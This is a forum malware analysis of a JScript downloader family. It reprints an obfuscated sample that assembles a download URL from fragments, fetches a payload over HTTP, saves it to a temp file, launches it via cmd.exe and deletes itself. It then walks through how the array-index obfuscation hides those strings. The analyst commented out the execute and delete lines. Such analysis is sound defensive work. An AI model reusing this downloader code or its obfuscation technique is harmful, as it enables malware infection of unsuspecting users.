Malware Analysis INFO_19595.js,EURO_8636.js,EMAIL_25793.js : improvement of obfuscation method used in POSTNORD_1755

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/21-11-2016-7.65690/
Thanks to @Daniel Hidalgo

8/54 INFO_19595.js
6/54 EURO_8636.js
6/54 EMAIL_25793.js

Why these samples ?
Because there are from the same family I analyzed few days ago, but the error mentioned and obfuscation used with the arrays has been improved.

YOU REALLY NEED TO SEE THE PREVIOUS ANALYSIS BEFORE READ THE CURRENT ONE
The link from the previous test :
https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/

These 3 samples use the same URL to download the payload, and the script parts use the same obfuscation methods.
So, I will only shows the changes from POSTNORD_1755.js using as example EMAIL_25793.js

1) What it looks like :


As usual, I made some modification on the spoiler part to avoid "copy-paste => save => run => infection :p
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var yfezico0 = [8, "9 =", 9, 8, 8, 8, 5, 1]["1"];
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
var kzunaxve5 = [6, 5, 7, 7, 6, 7, 8, 5, "eTo"]["8"];
var jzucpekkage = [4, 3, 6, 3, 5, 4, "cia", 2, 6, 3]["6"];
var otvebolhyn = [5, 9, 5, 6, 2, 3, 8, 'on', 4, 2]["7"];
var bvunygze9 = [2, "rn '", 2, 6, 1, 6, 5, 1]["1"];
var yfjobulki = ["jw ", 1, 1, 7, 1, 6, 1, 4, 6, 4]["0"];
var jyryxxirnu = ['e', 2, 6, 2, 5, 9, 6, 4]["0"];
var qdiqxywili4 = [4, 7, 1, 5, "1')", 3, 3, 9, 5, 2]["4"];
var ohmicmoftil = ["scri", 6, 5, 4, 7, 6, 5, 4, 6]["0"];
var ygpagag = [4, 9, 6, 3, 2, "ont", 5, 2]["5"];
var lagyvgeq4 = [6, 3, 5, 1, 5, 2, "lFo", 3]["6"];
var xqasmyvpe = [" 4;", 3, 5, 2, 6, 8, 6, 9, 4]["0"];
var usbijvepij = [6, 3, "ngt", 8, 9, 9, 1, 4, 6, 3]["2"];
var qziherlamwo = [8, 2, 2, 6, 9, 6, 3, 9, "h.t", 4]["8"];
var slyplumxop8 = [1, 6, 8, 4, 3, 6, "bje", 9, 1, 1]["6"];
var iwebog = [5, 4, 3, 5, 7, "yst", 3, 5, 4]["5"];
var gemoto6 = [5, 3, 5, 3, 8, 3, "etu", 8, 9]["6"];
var binsujod1 = [3, 4, "xv9", 8, 7, 5, 8, 5, 3]["2"];
var bzacoge6 = [1, 4, 1, 3, "stem", 6, 7, 5, 5, 7]["4"];
var izretadvi = [3, 5, 2, 1, "ive", 7, 9, 2]["4"];
var cbufzeqkulc5 = [1, 3, 6, 6, 4, "MSXM", 2, 9]["5"];
var tanynu2 = [4, "ct';", 4, 6, 5, 6, 2, 8]["1"];
var iqjiwpalo = [9, 7, 9, 9, 8, 2, 5, "tiv", 6, 2]["7"];
var utyxoju2 = ["g.Fi", 4, 9, 3, 8, 3, 9, 4]["0"];
var otyvzysun = [7, 3, "urn", 4, 2, 3, 1, 4, 8, 7]["2"];
var qusuhyxi = ['Stat', 1, 8, 3, 2, 6, 5, 5]["0"];
var yfomgurudm = [7, 8, 8, "Nam", 5, 5, 6, 1, 2]["3"];
var worityn = [8, 2, "Act", 9, 8, 1, 8, 8, 1, 7]["2"];
var vvecjijki4 = [4, 4, 6, 9, 6, 1, 5, "htt", 8]["7"];
var lgufjaregzi = ['iti', 7, 2, 3, 7, 2, 3, 9, 6, 4]["0"];
var aqympiw = WScript;
var akiwely = [7, "0()", 1, 7, 3, 6, 3, 8]["1"];
var yxytud8 = [2, 9, 7, "p:/", 5, 4, 2, 9]["3"];
var uzanulx = [2, 7, 8, 6, 8, 1, 1, 5, 4, "asu"]["9"];
var uxysizi = [4, 6, 6, 2, 6, 8, 9, "/ww", 7]["7"];
var fumweledzu6 = ["ipt.", 5, 2, 8, 2, 6, 6, 5]["0"];
var wexuflu = [1, 3, 8, 2, 'me', 9, 1, 2, 5]["4"];
var rajkezhefli = [8, 3, 6, 4, 7, "ptin", 1, 2, 4]["5"];
var ugipit5 = [5, "op/", 7, 7, 5, 3, 7, 3]["1"];
var ruxrabu = [7, 'me', 9, 6, 7, 5, 7, 8]["1"];
var qcevesrozci = [4, 6, 9, "h >", 6, 5, 9, 5, 5]["3"];
var yptypmewo4 = [8, 7, 9, 6, 1, 7, 2, "ily"]["7"];
var yfhopiqluhh2 = [7, 8, 5, 7, 1, 4, "ath", 4, 4]["6"];
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
var zevibnib = [1, "seB", 1, 4, 2, 2, 2, 5, 7, 8]["1"];
var jajyhyxwy = [7, 6, 5, 8, 2, 8, 8, 3, 6, 'Ful']["9"];
var yjybxywif5 = [8, 9, 2, "teP", 8, 7, 4, 7, 5]["3"];
var wmunafy = [7, 3, 7, 6, 2, "eam", 8, 9]["5"];
var gamcedeku0 = ["jw.", 8, 8, 1, 1, 5, 8, 7]["0"];
var mazqakyjzo = [3, 5, 5, "ADO", 5, 5, 5, 5]["3"];
var osabaq = [9, 6, 2, 'Typ', 1, 1, 1, 2]["3"];
var nygqyczoz = [2, 3, 4, 7, "MLHT", 9, 8, 6, 6]["4"];
var bidnovvyqp6 = ["apl", 4, 3, 5, 9, 7, 4, 1, 3]["0"];
var awgykpomoj1 = ["Clos", 3, 9, 3, 9, 2, 8, 9, 7, 2]["0"];
var tfufubres0 = [3, 5, 8, 5, 7, 'Tem', 8, 5]["5"];
var keluqy4 = [3, 2, 2, 9, 1, 9, "bje", 7]["6"];
var lgimonra3 = [1, "Pos", 1, 9, 2, 4, 1, 4]["1"];
var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
var zbydiqsoli4 = [6, "at", 5, 5, 2, 2, 1, 9, 1, 8]["1"];
var brisewet = [6, 5, 9, 7, 9, "L2.X", 1, 4, 9, 4]["5"];
var fjynhevonra1 = [2, 'Sav', 9, 2, 9, 3, 2, 8, 1, 5]["1"];
var molycohj0 = ["e('", 6, 1, 5, 2, 5, 3, 9, 3, 7]["0"];
var ashesubw5 = [5, 5, 4, 8, 2, 5, 1, 5, "akp", 2]["8"];
var mypzynkug = ["?f=", 1, 9, 8, 8, 7, 4, 3]["0"];
var hnegfepsuta3 = [2, 7, 3, 4, 1, 3, 5, 6, "te", 9]["8"];
var brigigo4 = [6, "Obje", 5, 5, 2, 5, 9, 3]["1"];
var iveruky = [3, 3, "Abs", 6, 6, 7, 2, 2, 4, 9]["2"];
var hdocirzy1 = [5, 6, "e", 2, 5, 9, 2, 7, 9]["2"];
var kjunyhimo = [8, 9, 4, 7, 1, "Get", 5, 6, 8]["5"];
var tonumejt = [3, 6, 5, "ipt", 3, 1, 7, 1]["3"];
var tigviqzave7 = [9, "ing", 8, 5, 4, 1, 1, 8]["1"];
var ysgupuphuwh = [3, 9, "wug", 2, 7, 4, 8, 3, 2, 6]["2"];
var umunozemw = [1, 5, 2, 4, 6, 9, 8, 8, "retu"]["8"];
var djyvoroc = [7, 6, 8, 5, 9, 9, 2, "l", 1, 7]["7"];
var ytydqesxer0 = [9, 1, 8, 3, 6, 4, 3, 2, "ew ", 9]["8"];
var exaqkyvtir = [4, "t(m", 7, 5, 6, 5, 5, 6]["1"];
var uvmewasca = [9, 7, 1, 9, 8, 8, 3, 2, 4, 'r']["9"];
var izucuwg3 = [6, 2, 4, ".le", 7, 3, 9, 1, 5]["3"];
var ucyvyxquqk = [9, 9, 7, 9, 8, 3, "jec", 2]["6"];
var ynabovx4 = [6, "us", 5, 3, 6, 8, 4, 7, 8]["1"];
var omxemhylf2 = [4, 5, 3, 4, 6, " jr", 4, 2, 6]["5"];
var ysvafvef4 = [2, 6, 6, 8, 6, "ret", 4, 1]["5"];
var evqubecipn7 = [1, 7, 9, 3, 4, 9, 1, "); ", 6, 6]["7"];
var bifwotpu = ["; r", 9, 1, 5, 4, 7, 9, 7, 5]["0"];
var jenhadno1 = ['ody', 2, 1, 8, 4, 1, 9, 7]["0"];
var rtyrcomozsa8 = [8, 5, 4, 9, 'Get', 5, 4, 1]["4"];
var yksazbasfo8 = [6, 'Res', 6, 9, 8, 1, 9, 1, 5]["1"];
var ywdoczycg = [3, 5, "Str", 3, 6, 1, 5, 7]["2"];
var nuvykkorbu = [7, "Shel", 1, 7, 8, 2, 2, 1, 9]["1"];
var onbitbij = ["WScr", 8, 7, 4, 7, 3, 8, 2, 5, 8]["0"];
var ybyjecehm = [2, "DB.", 6, 2, 6, 8, 6, 8]["1"];
var vwafgehni0 = [1, 9, 6, "run", 6, 6, 8, 1, 6]["3"];
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
var uqdostufy1 = [5, 5, "= n", 9, 6, 5, 1, 3]["2"];
var bbegvobexjy6 = [1, 2, 1, 3, 5, 8, 2, 4, "TP"]["8"];
var porosy6 = [9, 3, "asu", 5, 8, 1, 9, 3]["2"];
var hgudipcu = [2, 4, 2, 2, 1, 4, 6, "n", 1, 3]["7"];
var ojhenyteht = ["rn ", 3, 5, 6, 1, 9, 9, 5, 2, 7]["0"];
var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
var ofeqyxhuwt = [4, 9, "eXO", 1, 3, 7, 1, 3]["2"];
var kpiheko = [3, 8, 5, 5, 6, 6, 5, 6, "ugv", 5]["8"];
var deqxihaky = [2, 9, 7, 5, 2, 9, "olu", 1]["6"];
var kyvgicis3 = [1, 3, 1, 3, 7, 4, 1, 8, "var", 1]["8"];
var obutdymi = [4, 'Fil', 4, 4, 8, 7, 4, 5, 2]["1"];
var tkymrawcy = [2, 5, 3, 9, 1, 'ipt', 8, 3, 6, 7]["5"];
var fhadisuhy = [6, 6, 3, 1, 8, 4, "leS", 2, 1, 6]["6"];
var rzedsygwu = [3, 3, 6, 7, 7, "w.c", 5, 1]["5"];
var anhujyv1 = [3, 5, 9, 8, "\\\\", 9, 4, 7]["4"];
var udbuxdakhavq = [1, 2, 8, 6, "adm", 9, 5, 1]["4"];
var fdukezyh8 = [6, 5, 3, 5, 9, 9, 6, 2, "Scr", 7]["8"];
var texlopkak1 = [2, 7, 5, 3, "Scr", 8, 6, 8, 6, 6]["4"];
var episyvt7 = [7, 6, 5, 8, 5, 1, 6, 7, "php", 9]["8"];
var ewnehaca = [8, 9, 9, " Ac", 3, 9, 2, 1]["3"];
var emytipq = [7, 4, 5, 9, 1, 5, 3, "ct;", 3, 3]["7"];
var soxispi = [1, ".Fi", 2, 2, 3, 1, 5, 9]["1"];
var ihdufdutynd6 = [9, 8, 5, 3, 4, 6, 3, 2, 6, "XOb"]["9"];
var uflesepf = [3, "riv", 2, 4, 4, 2, 6, 6, 8, 9]["1"];
var zudxoba8 = [2, 7, 'e', 3, 3, 4, 4, 7, 3, 1]["2"];
var bacodta2 = [4, 7, "emO", 8, 5, 8, 4, 1, 4]["2"];
var afehjate1 = [9, 5, 'lNa', 1, 9, 3, 7, 5, 2, 8]["2"];
var exacdubx = [3, 8, 9, 8, 7, 5, "in.", 8, 3]["6"];
var oxefzetfez2 = [1, 2, "vil", 5, 9, 4, 2, 4, 3, 5]["2"];
var ipexetl = [5, 8, " jr", 6, 2, 2, 4, 1, 2]["2"];
var hhitwycyxd0 = [4, 4, 5, 1, 6, 'lde', 1, 2]["5"];
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
var snumsisike = [8, 1, 4, 3, 3, 9, 1, 'Wri', 6, 7]["7"];
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
var quludvi1 = ["Spe", 8, 3, 7, 9, 1, 9, 5]["0"];
var aptimota = [8, "var", 9, 6, 6, 7, 4, 7, 4]["1"];
var mixemrid4 = [9, 5, "ct", 2, 6, 5, 7, 5, 8, 9]["2"];
var odrifmigh = [8, "lesy", 1, 5, 7, 3, 8, 8, 7]["1"];
var odomebef = [4, 6, 7, 8, 7, 3, "pon", 5]["6"];
var zcexsaqekg = [2, "Get", 1, 9, 3, 9, 8, 1]["1"];
var ulhabvaze2 = [8, 5, 6, 9, 7, 7, "edz", 4]["6"];
var etjufymurb = [3, 7, 8, 3, 9, 4, "yxv", 2, 4, 5]["6"];
var mopepo = ["GET", 7, 6, 2, 9, 7, 6, 5, 5]["0"];
var xdimrugva0 = [2, 8, 8, 2, 2, 3, 8, "ovw"]["7"];
var ahnensuhuv = [6, 6, 8, 9, "2.d", 7, 8, 8]["4"];
var gibdymco0 = [4, "pNa", 3, 9, 4, 5, 6, 6]["1"];
var ipjatzypko = [4, "zyd", 6, 6, 1, 8, 8, 5]["1"];
var cimwenxi = [9, " ov", 5, 4, 6, 5, 7, 8, 4, 6]["1"];
var urtiwguqja = [4, 1, 'Ope', 9, 8, 6, 7, 9, 3]["2"];
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
var irvyrzisi1 = [4, 7, 2, umunozemw + bvunygze9 + ohmicmoftil + rajkezhefli + utyxoju2 + odrifmigh + bzacoge6 + brigigo4 + tanynu2, 6, 9, 4, 9]["3"];
var dijditonz6 = [2, 4, 3, 3, 6, 7, kyvgicis3 + ipexetl + porosy6 + yfjobulki + uqdostufy1 + ytydqesxer0 + worityn + izretadvi + ihdufdutynd6 + ucyvyxquqk + exaqkyvtir + ipjatzypko + ashesubw5 + bidnovvyqp6 + akiwely + evqubecipn7 + aptimota + cimwenxi + ysgupuphuwh + oxefzetfez2 + etjufymurb + yfezico0 + omxemhylf2 + uzanulx + gamcedeku0 + kjunyhimo + iveruky + deqxihaky + yjybxywif5 + yfhopiqluhh2 + yfomgurudm + molycohj0 + qdiqxywili4 + bifwotpu + gemoto6 + ojhenyteht + xdimrugva0 + kpiheko + yptypmewo4 + binsujod1 + izucuwg3 + usbijvepij + qcevesrozci + xqasmyvpe, 5]["6"];
var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
var yvyndax = [6, 2, 4, 6, 3, 6, 5, 4, mazqakyjzo + ybyjecehm + ywdoczycg + wmunafy, 3]["8"];
var ijigsokhimw3 = [5, 5, 2, 9, 6, vvecjijki4 + yxytud8 + uxysizi + rzedsygwu + ygpagag + uflesepf + ulhabvaze2 + qziherlamwo + ugipit5 + udbuxdakhavq + exacdubx + episyvt7 + mypzynkug + ahnensuhuv + zbydiqsoli4, 3, 1, 5, 4]["5"];
var derfycgy = [5, 2, 8, 6, 2, 6, onbitbij + fumweledzu6 + nuvykkorbu + djyvoroc, 3, 7, 4]["6"];
var axduxynat = [cbufzeqkulc5 + brisewet + nygqyczoz + bbegvobexjy6, 1, 1, 6, 7, 9, 6, 8]["0"];
var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
var zgafgado = [6, 8, 6, 7, 7, 8, 7, anhujyv1, 2]["7"];
var yzozyvy = [4, 4, 7, 6, mopepo, 9, 2, 1, 1, 9]["4"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
var imis9 = aqympiw;
var mzydakpapl0 = new Function(irvyrzisi1);
var mujegbe = [2, 7, 1, 8, ["rka", 1, 3, 6, 5, 5, 7, 7, 9], 1, 2, 3, 2, 2]["4"];
var cafyjep8 = [8, [6, 6, 3, 1, 3, 6, 4, 6, "cmi", 6], 5, 6, 8, 4, 2, 4]["1"];
var zfukqilvalho7 = [6, 9, 9, 3, 4, 9, 2, 9, 3, [2, 9, 7, 5, 1, 8, 5, 3, "up"]]["9"];
var yxivuvwus = [5, 9, 8, 1, 5, 3, 3, [4, 2, 9, 3, "vpa", 6, 7, 4, 5], 4]["7"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var yqlypnuksud = [8, 4, [8, 7, 1, 7, "gy", 3, 6, 4, 9, 6], 2, 5, 5, 8, 8, 1, 3]["2"];
var dcigacwa4 = [1, 5, 5, 7, 1, 9, 7, [1, 6, 1, "tto", 6, 2, 8, 5, 5], 7, 9]["7"];
var ubmycoble0 = [[2, "zh", 1, 3, 2, 5, 7, 4, 5], 7, 8, 3, 2, 9, 4, 2, 2, 6]["0"];
var ujtodunyf5 = [6, 7, [3, 5, 5, "co", 8, 4, 9, 8, 1], 8, 1, 1, 4, 5]["2"];
var japumu0 = [8, 6, [4, 7, 4, 7, 5, "ry", 9, 8, 6, 7], 7, 5, 5, 6, 1, 9, 3]["2"];
var zuvlezyxe8 = [[4, "lm", 6, 7, 6, 8, 9, 9, 5], 2, 1, 5, 3, 4, 1, 1, 1]["0"];
var ebecuntu5 = [5, 2, 3, 3, 5, 4, 2, ["lqy", 8, 2, 7, 6, 6, 1, 9, 6], 6, 1]["7"];
var mrovwegigca = [9, 3, 8, 3, 5, 1, [2, 2, "avb", 4, 5, 5, 4, 2], 6]["6"];
var zytxyfloldu = [7, 8, 2, 2, 6, 2, [4, "aq", 4, 8, 9, 3, 7, 8, 5, 9], 5, 4]["6"];
var qygsuwwo = [1, 1, [8, 2, "ex", 9, 6, 1, 8, 3], 4, 3, 1, 3, 5]["2"];
var ujdyqkoz = new Function(dijditonz6)();
var asborqyqkyrm0 = [3, [7, 1, 1, 1, 3, 9, "o", 2], 7, 9, 3, 8, 9, 5, 8, 1]["1"];
var gykehogcu3 = [5, 8, 9, 4, [4, 1, 5, 1, 6, 4, 7, "k", 3], 2, 9, 8, 3]["4"];
var daxzaxyme4 = [2, [1, 8, 8, 4, "abt", 1, 9, 7, 6, 8], 2, 7, 2, 1, 5, 6, 1]["1"];
var hcimuqxixw4 = [7, 8, [5, "u", 9, 5, 6, 9, 3, 6], 7, 9, 3, 6, 5]["2"];
var hujcesej = [9, 4, [4, 2, 7, "mna", 8, 6, 5, 5], 7, 4, 4, 9, 8, 7]["2"];
var epowpabnohp4 = [5, 8, 3, ["sc", 4, 8, 2, 7, 5, 6, 1], 9, 7, 5, 6, 2, 1]["3"];
var ymseppybi4 = [[6, 9, "va", 3, 3, 1, 8, 3], 2, 2, 9, 2, 3, 3, 8]["0"];
var gpasgufxeti0 = [4, 1, 4, 2, 5, 1, [8, 7, "g", 4, 7, 7, 8, 4, 9], 8, 3, 5]["6"];
var utduhaciwp3 = [1, 2, [8, 4, 7, 1, 2, 6, 3, 1, 7, "it"], 2, 4, 8, 3, 5]["2"];
var mjowyfzuk = [8, 9, 2, 5, 2, [4, "o", 4, 9, 1, 2, 1, 7], 3, 8, 5]["5"];
var vekxiby = [8, 9, 6, [5, 7, 2, 8, 4, "kq", 5, 7], 7, 6, 1, 4, 6]["3"];
var omalobre7 = [1, [5, 1, 5, 4, "xu", 3, 4, 7, 9, 7], 4, 9, 8, 8, 4, 9, 4]["1"];
var azocxisw = [[4, 8, 9, 8, "ufk", 8, 2, 3], 6, 2, 7, 2, 3, 2, 3, 9, 5]["0"];
var yxycqati = [5, 2, [5, 9, 9, 6, 4, 9, "z", 2, 8, 1], 7, 5, 1, 4, 9]["2"];
var guzcapebh = [3, 6, 5, 7, 8, 2, 9, [7, 3, "o", 4, 8, 6, 4, 7, 8]]["7"];
switch (ujdyqkoz) {
case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
var owdeqg2 = yvyndax;
var ekwidedul = new hvaqxena(owdeqg2);
ekwidedul[urtiwguqja + hgudipcu]();
var qupqykmy = ijigsokhimw3;
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
var gmavabava8 = derfycgy;
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
var exet3 = new hvaqxena(gmavabava8);
var qrujcydvipd9 = axduxynat;
var gvidummulj7 = epcemescip;
var jrasujw = new hvaqxena(gvidummulj7);
var abogikn = new hvaqxena(qrujcydvipd9);
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);
abogikn[pdimuly]();
ekwidedul[osabaq + zudxoba8] = 1;
if (abogikn[qusuhyxi + ynabovx4] == 200) {
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);
ekwidedul[awgykpomoj1 + hdocirzy1]();
var yhamgyv1 = odynfinteds + czeqip;
//exet3[vwafgehni0](yhamgyv1, 0);
}
//jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);

2) Main differences with previous analyzed POSTNORD_1755.js :

2-1 ) The arrays parts :

Before :


The strings really used were obfuscated, divided using several vars with strange names, each part hidden on a array + function call :

var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();

var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();

var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();

var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();

var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();

We have seen on the previous analysis that .wuqjy() was a function used to hide the real JavaScript function used : .pop()
=> to retrieve the last value of the array
For example :

var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
that is in reality :

var ifpagn3 = "ri"
Using this method, long strings used in the main part of the script are replaced by concatenation of several strange variable names, but with content is the part of understandable strings.
An example In the main part (after several functions and vars have been build with the above method) :

enxocqojolv5 + izavoned3 + mkaqaxykco0 => !?!?
A search (with notepad++, for example) give :

var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();

var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530,"it"].wuqjy();

var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();

=> enxocqojolv5 + izavoned3 + mkaqaxykco0 = "Write"​

With this method, it is very easy to find the "piece of strings" because it is always the last value of the array that is useful.

The previous sample in details : https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/

In the new samples :

They have tried to improve this parts with another sorts of array and retrieving method.

3 sorts of arrays are used :

I will show 3 examples from a lot of arrays used :

var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];

How it works to retrieve the "piece of words" ?

(1) var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
=> I have put in red the index to be used to get the right value (remember the first value is at index 0, the second at index 1, etc)

=> var uwabbyranl = "cmd.";

It is the first part for the "cmd.exe ...."

(2) var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];

=> useless arrays, only in the script to obfuscate a bit more.

How can I know it ?
- because a search on the var name (here : ebqypsuzyn) , give only one result : this part => not used elsewhere
- the values at the given index is always another array :
here : [4, 3, 2, 3, 7, "zi", 6, 2, 5]

(3) var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];

=> the values retrieved is the result of a concatenation (addition, for strings) :

=>index 7 (remember, index begain with position 0)
=> value at position 7 is the concatenation of uwabbyranl + umqesas0 + ukekkiva
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];

=> "cmd."
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];

=> "exe "
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];

=> "/c "
=> var odynfinteds = "cmd.exe /c "

=> the first part for the run command Line (we will see later where this part is)​

Conclusion : Only two type of obfuscation with arrays are used to really obfuscate data used for the main part. The third type is to obfuscate a bit more the script, not real important data.
Now, the useful value is not the last value, but need the index clue to be found.​
2-2 ) The script file :

On previous sample, there were a part getting the script full path, but not used.

Now, at the end of the script, the current script is deleted

The part that get the current script path name :

- var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];

=> fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu = "Scr" + "ipt" + "Ful" + "lNa" + "me"
var imis9 = aqympiw;

var aqympiw = WScript;
=> var ecystogo = WScript.ScriptFullName

Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
The part that deletes the script :

- jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);

Each part :

=> Retrieved by search using the "strange name" and search tool from notepad++

- var jrasujw = new hvaqxena(gvidummulj7);
=> var gvidummulj7 = epcemescip;
=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];

=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4
=> "Scripting.FileSystemObject"
=> hvaqxena :

=> var hvaqxena = new Function(ileslyxy5)();

=> var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];

=> ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq
=> "return ActiveXObject;"​
then : jrasujw : new ActiveXObject( "Scripting.FileSystemObject");

=> object to manipulate files/ folder
- ifcedyka9 + exolcyky + igoptujmyk + bigpefco

var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];

=> "del"
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];

=> "ete"
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];

=> 'Fil'
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];

=> "e"
=> "deleteFile"
- ecystogo : we have seen at the beginning of this part that it is the full script path name

=> WScript.ScriptFullName
then : - jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)

Example :

